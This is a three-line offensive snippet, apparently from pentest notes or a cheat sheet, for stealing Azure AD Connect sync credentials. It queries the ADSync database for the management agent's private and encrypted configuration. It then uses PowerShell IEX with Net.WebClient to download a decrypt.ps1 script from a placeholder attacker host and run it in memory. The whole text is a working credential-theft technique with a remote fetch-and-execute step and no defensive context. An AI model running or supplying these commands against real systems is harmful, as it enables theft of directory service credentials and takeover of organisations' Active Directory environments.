sqlcmd -Q "Use ADSync; select private_configurateion_xml,encrypted_configuration FROM mms_management_agent"
# download the code as decrypt.ps1 and make sure you change the Data Source.
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')